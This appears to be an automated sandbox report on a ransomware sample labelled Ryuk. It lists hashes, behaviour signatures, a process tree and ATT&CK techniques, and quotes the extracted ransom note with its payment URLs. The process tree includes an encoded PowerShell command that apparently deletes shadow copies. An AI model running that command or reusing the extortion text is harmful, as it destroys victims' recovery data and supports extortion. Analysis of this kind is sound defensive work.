Analysis

  • max time kernel
    171s
  • max time network
    155s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    30-01-2022 08:03

General

  • Target

    0fc141d6bb7eb031915cf916e92df0d8baa18047ddb4fc0be7653b9a7d6d31de.exe

  • Size

    166KB

  • MD5

    e95162f6cffa1a72a495a8edc11ee51b

  • SHA1

    ecea28ecbcb64cadccc161e7e864c516f7b96523

  • SHA256

    0fc141d6bb7eb031915cf916e92df0d8baa18047ddb4fc0be7653b9a7d6d31de

  • SHA512

    65b5f90c9f0f9bdee323554cbc1d5d2869268af8e181e75a6d872e396537ad3b4021635a8d0236e89c3b81f00c502931fd884e49c9283bccc1a6c82426bcc440

Score
10/10

Malware Config

Extracted

Path

C:\33394668-readme.txt

Family

ryuk

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 33394668. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. I suggest you read about us on the Internet, we are known as "Sodinokibi Ransomware". For example, this article: https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread Pay attention to that: "How Much Data Is Decrypted with a Ransomware Decryptor? In Q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. This statistic varied dramatically depending on the ransomware type. For example, Ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while Sodinokibi was close to 100%. " Now you have a guarantee that your files will be returned 100 %. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1D79EC7A3E0A04D9 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/1D79EC7A3E0A04D9 Warning: secondary website can be blocked, thats why first variant much better and more available. If you have problem with connect, use strictly TOR version 8.5.5 link for download TOR version 8.5.5 here: https://filehippo.com/download_tor_browser_for_windows/ When you open our website, put the following data in the input form: Key: yEwlxoyC75FUY9JtJ9i/APOVNUP2KzWlUTTiAIAB/JJVx+vxZWh7MUVbsFMGLaiK 1fKWTLw/2XmoGqc7vMmbAd0LnZjwJcCTR9MqUZuuQeD8AlhzteTMKALN6+fjVeiz +gQGVTiNIHS272quPNpodiMMbdtb3CUijs9PXBfCxO8slGRvcjLsQ0gsEhmAfQz2 psREeqd85GzXLUN8A7cehPjX7EhCD02ka2ziqlm+VKR6Q7PmvvlpnugVMEf7zazm 0YBokcUC/VSDpY6JbCo5A+usC6IHyBEzM/6yQckNz+058aLKoMOxrQdPFw3dUVjS bKUcTAwNwyGKpn5D5XmZBuu2SUdTTc7RyLJelP07u8dm3IM6TZ0LB3CdVaon+vzY VwBV2i2hXbZvbdWSq42bT1DGsq2YZJwclX4eVWthkhiJgfK95h3Qt6TbD8p1b43L 23gs3i0iK6pbfgcDTKNBlHg56r3wzxANKV/NNw34cizklNvYVAWAUg0qzhh+79gl Z7VzDvB1bhfD9QwlL0iuufSS9F6z1pSibYsPxQHquFQIlTapZnGzdNfFk7GlrIL2 LIQIiYxeJ7oi1MgdbUkGDL/M1QL4deVVWn/QJ6GnaB6UwjwphdjNo9+N56dFyMQw 9DDWPIoO+HR+D7Oq+3GpCvOQgj9R4o9ROmIO21mfTLQsm7uPfOC4338/Sx492MBu TV/LjsEPU1jyDWSIYv08NbyDVZj6dnCKyhNB6zOeyKb/HWR/wad+rJSA0I9H8xCs 5NHONScUV5dSpx53GYQN8pJ7vdlRMiaxkwopoO4jP8eH7vGIM0x5Uf9RJghXRZ+v It6Zj42yol+QrWxi8Jb9jqH7QLgsMg3QA0Bmp6dRjS1Y2NbO1iFTUsh6F8AZJphb sXKSeuBBCGifmQps9N+x05XRJA9ppZFx4Dz0zVlVPCFYf3ltIZEXKjaoHwWUqXgh nzoezO4YKhAn8tpJDTed3Mewt1LqT/U7uLGrDyLnyeVDa/GMTYVDbMwtcP7NEt56 9mirSV4RRBsyChua2CrxMK9r9FAkki0wtI+S5E7l0gou3wE/Bo4NdLiMUtMEKodo FidVBkPAOp8kcto9556wnIdjpOX96VmtoJySQnPAg1bTB6xzpDQhpqna9HLvPeDZ 75LczBFMeoR33OCtFakzCh3W+5LL6wMRenbloN1ygYJ8Dv27ZM6UFNEUay2kSfAn QUgrUeI7J3qE3OFwtqmfe9MDuDB8AvpOezDj2kuMT9+o8ZgQS3wJ+h/VuXVC2y5l Azu1GyM6JfONMPdi+dx/n+dHdlw= Extension name: 33394668 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1D79EC7A3E0A04D9

http://decryptor.cc/1D79EC7A3E0A04D9

https://filehippo.com/download_tor_browser_for_windows/

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 28 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0fc141d6bb7eb031915cf916e92df0d8baa18047ddb4fc0be7653b9a7d6d31de.exe
    "C:\Users\Admin\AppData\Local\Temp\0fc141d6bb7eb031915cf916e92df0d8baa18047ddb4fc0be7653b9a7d6d31de.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4524
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:4236
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1156

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4524-123-0x0000015920E30000-0x0000015920E52000-memory.dmp
      Filesize

      136KB

    • memory/4524-128-0x000001593B240000-0x000001593B2B6000-memory.dmp
      Filesize

      472KB

    • memory/4524-136-0x00000159390E3000-0x00000159390E5000-memory.dmp
      Filesize

      8KB

    • memory/4524-135-0x00000159390E0000-0x00000159390E2000-memory.dmp
      Filesize

      8KB